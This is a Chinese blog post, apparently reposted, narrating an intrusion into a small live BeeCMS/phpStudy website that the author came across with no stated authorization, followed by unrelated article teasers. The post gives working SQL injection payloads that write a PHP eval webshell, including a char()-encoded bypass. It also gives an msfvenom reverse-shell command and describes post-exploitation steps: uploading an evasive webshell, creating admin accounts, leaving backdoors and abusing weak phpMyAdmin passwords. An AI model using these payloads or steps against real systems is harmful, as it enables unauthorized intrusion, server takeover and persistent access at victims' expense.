记一次小网站渗透过程

news/2024/5/20 3:09:15/文章来源:https://blog.csdn.net/qq_42111373/article/details/105667190

一、序言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

二、渗透过程

  1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞
    在这里插入图片描述
  2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php
    在这里插入图片描述
  3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入在这里插入图片描述
  4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过在这里插入图片描述
  5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以

方法一

1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点
2.一把梭,发现并没有,使用脚本也没有绕过
在这里插入图片描述
方法二
1.通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过
在这里插入图片描述
2.对shell部分进行编码
在这里插入图片描述
3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。
ps:这里的写入路径纯属盲猜,运气好,默认目录
在这里插入图片描述
4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲
在这里插入图片描述
char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#
在这里插入图片描述
一样成功写入


1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下
在这里插入图片描述2.md5解密,wocao,成功登陆,然后就是后台找上传了
在这里插入图片描述

三、后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去
在这里插入图片描述
方法一

1.通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听
在这里插入图片描述
3.不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传
2.访问大马
在这里插入图片描述
3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等
4.创建admin权限账号之后,登陆服务器
在这里插入图片描述

四、一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell
在这里插入图片描述

五、总结

1.前台sql注入获取用户名密码,进入后台找上传
2.SQL注入语句写入一句话
3.phpmyadmin一句话getshell
4.上传大马提权
至此,渗透结束。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_878464.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

_031_EclipseOperation_Eclipse修改导航栏的颜色

以上是个人随性配置&#xff0c;某些项的设置不懂&#xff0c;结果如下&#xff1a;

网站跨站点单点登录

昨天和几位朋友探讨到了这个话题&#xff0c;发现虽然单点登录&#xff0c;或者叫做独立的passport登录虽然已经有了很多实现方法&#xff0c;但是能真正了解并实现的人却并不太多&#xff0c;所以些下此文&#xff0c;希望从原理到实现&#xff0c;能让大家了解的多一些 至于什…

如何添加网站的浏览器 ico 图标

什么是网站 ICO 图标&#xff1f; 打开微软、百度等网站后看到浏览器的标题栏、地址栏&#xff0c;多浏览器的标签上都显示了一个小图标&#xff0c;如 &#xff0c;这里说的就是这个东东。 如何制作 ICO 图标&#xff1f; 这里使用最简单的办法。因为 ico 格式图片比较特殊&a…

一键SSH宝塔/Shell原生安装LNMP(Centos7.5 + Nginx + MySQL +PHP)+thinkphp/Wordpress搭建网站(附源码)

可以使用宝塔工具搭建&#xff0c;也可以使用我下面的教程进行搭建。 一、宝塔工具搭建具体操作&#xff1a; ssh登录centos服务器&#xff0c;下载安装宝塔工具centos版本&#xff0c;一键安装LNMP环境。大概需要10-20分钟吧&#xff1b;安装完成后进入应用市场&#xff0c;选…

怎么做好企业网站关键词优化

一、关键词的选择 1、企业品牌词 品牌关键词非常重要&#xff0c;可以说如果不重视品牌词部署&#xff0c;会影响到网络营销效果。品牌关键词是一个网站的名称&#xff0c;具备唯一性&#xff0c;方便用户记忆。加上消费者对品牌的认知度是非常高&#xff0c;具备品牌的网站能…

【网站推荐】Event Registry‘s News

【网站推荐】Event Registrys News 公众号&#xff1a; ChallengeHub 1、简介 利用AI的力量将新闻内容转化为解释性的分析报告。Event Registry是世界领先的新闻情报平台&#xff0c;使组织能够跟踪世界事件并分析其影响。 Event Registrys News 官方网站&#xff1a;https:/…

在线教育专业建站工具 EduWind ,源码下载,源码分享网整理

在线教育专业建站工具 EduWind &#xff0c;源码下载&#xff0c; Eduwind是由北京水木信步网络科技有限公司开发的网校服务&#xff0c;公司位于清华科技园。目前&#xff0c;EduWind的产品系列包括以下两大版本&#xff1a; EduWind网校开源软件&#xff1b; EduWind网校Saa…

web php+mysql 网站优化方向

1.PHPMySql的存储缺点 在大部分的PHP的网站开发当中&#xff0c;我们往往采用的数据存储方式是phpmysql,因此就会产生如下图所示的请求方式&#xff1a; 以上的架构对一般对于访问量不大的网站没有任何问题&#xff0c;例如&#xff1a;个人博客网站&#xff0c;小公司的企业网…

谷歌浏览器“无法添加来自此网站的应用、扩展程序和应用脚本”的最简单办法

网上其他的办法都试了 有点坑 最简单的解决办法就是打开开发者模式 关了再开&#xff0c;再拖入crx就好了 具体位置&#xff1a;选项——更多工具——拓展程序 或者直接在浏览器里输入chrome://extensions/

大型网站的可伸缩性架构如何设计?

1. 网站架构的伸缩性设计 1.1. 不同功能进行物理分离实现伸缩 纵向分离&#xff08;分层后分离&#xff09;&#xff1a;将业务处理流程上的不同部分分离部署&#xff0c;实现系统伸缩性。 横向分离&#xff08;业务分割后分离&#xff09;&#xff1a;将不同的业务模块分离…

千万级用户的大型网站,应该如何设计其高并发架构?

目录 &#xff08;1&#xff09;单块架构 &#xff08;2&#xff09;初步的高可用架构 &#xff08;3&#xff09;千万级用户量的压力预估 &#xff08;4&#xff09;服务器压力预估 &#xff08;5&#xff09;业务垂直拆分 &#xff08;6&#xff09;用分布式缓存抗下读…

react+redux+ant+axios+iframe实现网站门户

一个框架壳子&#xff0c;技术栈reactreduxantaxiosiframe,实现侧边栏与导航栏还有头部&#xff0c;对打开的页签进行缓存&#xff0c;使用iframe与各个子系统页面相连。 对打开的页签进行缓存即使刷新页面的tag也不会丢失&#xff0c;界面如下&#xff1a; 这个实现的功能是侧…

某海量用户网站,用户拥有积分,积分可能会在使用过程中随时更新。现在要为该网站设计一种算法,在每次用户登录时显示其当前积分排名。用户最大规模为2亿;积分为非负整数,且小于100万。

http://www.mianwww.com/html/2012/11/17432.html PS: 据说这是迅雷的一道面试题&#xff0c;不过问题本身具有很强的真实性&#xff0c;所以本文打算按照真实场景来考虑&#xff0c;而不局限于面试题的理想环境。 存储结构 首先&#xff0c;我们用一张用户积分表user_score来…

linux服务器做301跳转,网站seo怎么实现301跳转,linux服务器设置301重定向方法!

原标题&#xff1a;网站seo怎么实现301跳转,linux服务器设置301重定向方法! 在SEO优化中&#xff0c;这些已经存在可能已被收录的页面链接&#xff0c;既不能贸然的删除又不能放任不管&#xff0c;由于这跟网站的权重是挂钩的&#xff0c;以是这个时辰301定向就派上用场了。301…

WEB阶段6:过滤器监听器全局字符修改案例用户权限过滤案例装饰者模式过滤敏感词汇统计当前网站在线人数

过滤器&监听器&全局字符修改案例&用户权限过滤案例&装饰者模式过滤敏感词汇&统计当前网站在线人数 回顾 JSP的页面脚本元素 组成部分语法格式JSP代码片段<% Java代码 %>JSP声明<%! 声明全局变量 %>JSP脚本表达式<% 变量值 %>注释<…

扩展 jQuery EasyUI Datagrid 数据行鼠标悬停/离开事件(onMouseOver/onMouseOut)

客户需求&#xff1a; jQuery EasyUI Datagrid 用户列表鼠标悬停/离开数据行时显示人员头像&#xff08;onMouseOver/onMouseOut&#xff09; 如图所示&#xff0c;Datagrid 鼠标悬停/离开数据行时切换了不同的样式显示&#xff1a; 此时用谷歌开发者工具审查鼠标悬停行元素时…

推荐一款在线伪原创工具,很适合做seo的朋友

打开常用浏览器,360极速&#xff0c;UC&#xff0c;谷歌浏览器均可这里就打开谷歌做演示 浏览器中输入http://www.yzcopen.com/选着站长seo工具 找到第一行"文章伪原创"工具 复制自己的文章即可点击生成伪原创 伪原创文章对于各大搜索引擎来说&#xff0c;收录会很不…

分享一波我是怎么让一个新网站IP量一天翻15倍的,腾讯云:DDOS攻击

一直想写一篇文章&#xff0c;和大家分享一下我的一个在线工具网站如何将网站的日IP访问量做到一天翻15倍的技巧。现在想想是时候可以分享一些了&#xff01;正如标题所说&#xff0c;在一定时间内做一个日IP访问量一天翻15倍的的网站有可能吗&#xff1f;当然有可能了。这也是…

查看当前网站的cookie的两种快捷方法

1.在浏览器的地址栏输入&#xff1a;javascript:alert(document.cookie) (不区分大小写)&#xff0c;就会弹出你在当前网页登录的cookie信息。 注意&#xff1a;你把以上复制进入地址栏后会发现&#xff0c;“javascript”字符串消失不见&#xff0c;不管“javascript”里面哪…

大型网站后台架构的演变

随着用户访问量的不断增加&#xff0c;网站的后台也会不断变化以应对需求。本文主要从一个小型网站到大型网站的过度与变化来陈述。 1.1 网站后台架构 主要指由web server 、应用服务器、数据库、存储、监控等组成的网站后台系统。 1.2 架构演变 个人站点后台架构。如图2-1…